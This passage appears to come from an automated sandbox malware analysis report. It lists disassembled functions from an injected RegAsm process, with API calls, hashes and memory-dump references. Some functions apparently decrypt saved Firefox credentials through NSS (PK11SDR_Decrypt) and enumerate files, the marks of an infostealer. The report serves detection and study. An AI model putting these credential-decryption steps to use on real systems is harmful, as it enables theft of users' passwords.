                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6E64DF
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6E64F2
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C6E6505
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C6E6518
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C6E652B
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6E671C
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6E6724
                                                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C6E672F
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6E6759
                                                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C6E6764
                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C6E6A80
                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C6E6ABE
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E6AD3
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6E6AE8
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6E6AF7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                                                                                    • API String ID: 487479824-2878602165
                                                                                                                                                                                                                                                    • Opcode ID: 62b011c06a1cbeef6fe1d3fc635640fcc1ef4ed5076a037d160dc1223acec002
                                                                                                                                                                                                                                                    • Instruction ID: 25d21aedc90ea8e95a6668b570d44cd3e3fe7390fc39f804b3626fe458c48246
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62b011c06a1cbeef6fe1d3fc635640fcc1ef4ed5076a037d160dc1223acec002
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21F1E670E0A22D9FDB20CF24CD48BDAB7B5AF09318F1441AAD919A7641D731EE84CF54
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6FED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C6FEE7A
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C6FEFB5
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C701695
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7016B4
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C701770
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C701A3E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset$freemallocmemcpy
                                                                                                                                                                                                                                                    • String ID: ~qml$~qml
                                                                                                                                                                                                                                                    • API String ID: 3693777188-1426070390
                                                                                                                                                                                                                                                    • Opcode ID: d4763e9d5cc3898b654306aa6b09f525357a11c0ed8125fc15ca2358f7fc5f2c
                                                                                                                                                                                                                                                    • Instruction ID: 4bfc71abe3a840b7c4c102fb622ffc2f31e5a25381406eb99b6a5127f15b2390
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4763e9d5cc3898b654306aa6b09f525357a11c0ed8125fc15ca2358f7fc5f2c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDB328B1E00219CFCB14CFA8C990A9DB7F2BF49314F2582A9D559AB745D730AD86CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00416FA0 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 159stringmemoryfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00416FCE
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00416FD5
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00416FEE
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00417005
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274E8), ref: 0041703C
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274EC), ref: 00417052
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00417070
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 004170C8
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004170D7
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015CF750), ref: 004170FB
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015D1628), ref: 0041710F
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF), ref: 00417119
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF), ref: 00417127
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Find$FileHeaplstrcatlstrlenwsprintf$AllocCloseFirstNextProcess
                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\*$0sA
                                                                                                                                                                                                                                                    • API String ID: 1803110163-21133683
                                                                                                                                                                                                                                                    • Opcode ID: b53dbe24b3008778359025f13f6be7f982cea954b8935d942d3bc0a884a63d4d
                                                                                                                                                                                                                                                    • Instruction ID: 67f659f62f1b98a3938f0308fc2a9a6c785d1408e9f0a28b75c27d6af1954414
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b53dbe24b3008778359025f13f6be7f982cea954b8935d942d3bc0a884a63d4d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F518371900318ABDB10EFA0DD49FEE7B79AF49704F00459DF615A3190DB78AB84CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E7810 Relevance: 21.4, APIs: 12, Strings: 2, Instructions: 372COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E744), ref: 6C6E7885
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E744), ref: 6C6E78A5
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E784), ref: 6C6E78AD
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784), ref: 6C6E78CD
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC), ref: 6C6E78D4
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C6E78E9
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 6C6E795D
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C6E79BB
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C6E7BBC
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C6E7C82
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E7DC), ref: 6C6E7CD2
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C6E7DAF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeavememset
                                                                                                                                                                                                                                                    • String ID: Dul$Dul
                                                                                                                                                                                                                                                    • API String ID: 759993129-1496190512
                                                                                                                                                                                                                                                    • Opcode ID: 6ee7cddb39dfa92677d8fde4455114d00ff018b39252920f19e3e6294b5c7112
                                                                                                                                                                                                                                                    • Instruction ID: 1c9e36f9045054582052b11c02264066b6cf98ce1f70023d89bb8929e04f6b11
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ee7cddb39dfa92677d8fde4455114d00ff018b39252920f19e3e6294b5c7112
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41027271E0521A8FDB54CF29C984799B7B5FF88318F6582AAD809A7711D730BE90CF84
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C717E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpystrlen
                                                                                                                                                                                                                                                    • String ID: (pre-xul)$data$name$schema$vul
                                                                                                                                                                                                                                                    • API String ID: 3412268980-3241126627
                                                                                                                                                                                                                                                    • Opcode ID: f45e36c1f3200f17c51e8d9f5cbea15cbb5c3a2c71a33a224fe56d9f6edd5a64
                                                                                                                                                                                                                                                    • Instruction ID: 23c6f5c17a8b8b1fc012caef48153d46b1f51c941f8ebcdafa3570bd7cedfaf4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f45e36c1f3200f17c51e8d9f5cbea15cbb5c3a2c71a33a224fe56d9f6edd5a64
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84E17DB1A043448BC710CF68C94065BFBEAFBC9314F558A2DE899D7790DBB0ED098B95
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6FD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD4F2
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD50B
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DCFE0: EnterCriticalSection.KERNEL32(6C75E784), ref: 6C6DCFF6
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DCFE0: LeaveCriticalSection.KERNEL32(6C75E784), ref: 6C6DD026
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD52E
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC), ref: 6C6FD690
                                                                                                                                                                                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C6FD6A6
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E7DC), ref: 6C6FD712
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD751
                                                                                                                                                                                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C6FD7EA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                                                                                    • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                                                                                                    • API String ID: 2690322072-3894294050
                                                                                                                                                                                                                                                    • Opcode ID: f00fba8af845edefc4089530630d46169c9e6c786175f871fc5b525c679a908f
                                                                                                                                                                                                                                                    • Instruction ID: 6619e43ec9b503a140f349e4cbd62abe764097f93a4663ff3ef8be6cd913745f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f00fba8af845edefc4089530630d46169c9e6c786175f871fc5b525c679a908f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F91D271A047058FD714CF28C59076AB7E2EB89318F54892EE56AC7B80DB34F846CB86
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00409110 Relevance: 16.6, APIs: 11, Instructions: 98stringencryptionCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00409139
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00409493,00000001,?,00001FA0,00000000,00000000,?,00409493), ref: 00409156
                                                                                                                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(00409493,00000000,?,00409493), ref: 0040915E
                                                                                                                                                                                                                                                    • PK11_GetInternalKeySlot.NSS3(?,00409493), ref: 0040916C
                                                                                                                                                                                                                                                    • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00409493), ref: 00409181
                                                                                                                                                                                                                                                    • PK11SDR_Decrypt.NSS3(00000000,?,00000000), ref: 004091B5
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004091D1
                                                                                                                                                                                                                                                    • PK11_FreeSlot.NSS3 ref: 004091EB
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(004268C6,004268CA), ref: 0040920D
                                                                                                                                                                                                                                                    • PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00420448), ref: 00409214
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(004268C6,004268CB), ref: 0040922F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: K11_$Slot$Freelstrcat$AuthenticateBinaryCryptDecryptInternalStringlstrlenmemcpymemset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2752138542-0
                                                                                                                                                                                                                                                    • Opcode ID: 11d3f1e3f146523b6ccfa74d668c92c5ffac87841470ebda9ed02fcb8bc6cd94
                                                                                                                                                                                                                                                    • Instruction ID: a355d26280a1196e10b87786ff5202aca07fbe083f3b5318579ce8667aafbf53
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11d3f1e3f146523b6ccfa74d668c92c5ffac87841470ebda9ed02fcb8bc6cd94
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D731D775B00219BBDB10DB84EC45FEF7779EF44705F1041BAFA08A6281D7745A08CBA6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C734EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 6C734EFF
                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C734F2E
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE ref: 6C734F52
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000), ref: 6C734F62
                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7352B2
                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7352E6
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000010), ref: 6C735481
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C735498
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                    • API String ID: 4104871533-3887548279
                                                                                                                                                                                                                                                    • Opcode ID: 7fbc14462a41009def42d5870f0d627050bdcc75fbd422208b30458b41a08beb
                                                                                                                                                                                                                                                    • Instruction ID: 5ffedf29a16a697141256ee99105f1023a2220d1b9c19ec88b9c8c2f885df2ae
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7fbc14462a41009def42d5870f0d627050bdcc75fbd422208b30458b41a08beb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77F1D271A18B108FC716DF39C85062BB7F5AFD6284F45872EF88AA7651DB31D842CB81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C737030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C737046
                                                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C737060
                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C73707E
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a Time entry), ref: 6C6E81DE
                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C737096
                                                                                                                                                                                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C73709C
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 6C7370AA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                                                                                                                                                                                                    • String ID: ### ERROR: %s: %s$(null)
                                                                                                                                                                                                                                                    • API String ID: 2989430195-1695379354
                                                                                                                                                                                                                                                    • Opcode ID: 956cbf1780993947bf08916a96dbab63113ddc12b168d33d5ba4e18a97a1e794
                                                                                                                                                                                                                                                    • Instruction ID: c22ff9e62fd6d73200e6d7b155d96f3d1eec90f5e46566a8e320ba38232d9b63
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 956cbf1780993947bf08916a96dbab63113ddc12b168d33d5ba4e18a97a1e794
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B701B9B1B00108AFDB045B64DC4EDBF7BBCEF49214F550439FA09A3241DE7179188BA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040A860 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 470fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
